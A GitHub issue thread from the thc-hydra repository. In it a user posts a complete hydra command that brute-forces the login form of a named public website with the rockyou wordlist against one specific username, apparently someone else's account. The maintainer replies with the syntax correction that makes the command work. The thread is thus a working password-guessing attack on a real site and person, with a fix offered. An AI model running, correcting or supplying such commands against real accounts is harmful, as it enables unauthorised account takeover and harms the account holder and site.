### ISSUE TITLE
the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^

### ISSUE THREAD

**Issue by lellykellyhack** [vanhauser-thc/thc-hydra#711]
the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: Incorrect password. Please try again.

the string is :

sudo hydra -l avocadoss -P /usr/share/wordlists/rockyou.txt 66.254.114.59 https-post-form "/user=^USER^&password=^PASS^&remember=1&_xfRedirect=https%3A%2F%2Fwww.lpsg.com%2F&_xfToken=1641852688%2C69efe90380d0edd409a9b066760b3d06:Incorrect password. Please try again. "

the site is lspg.com and the username is avocadoss

**Comment by vanhauser-thc** [comment]
missing semicolon  "/:user=..."
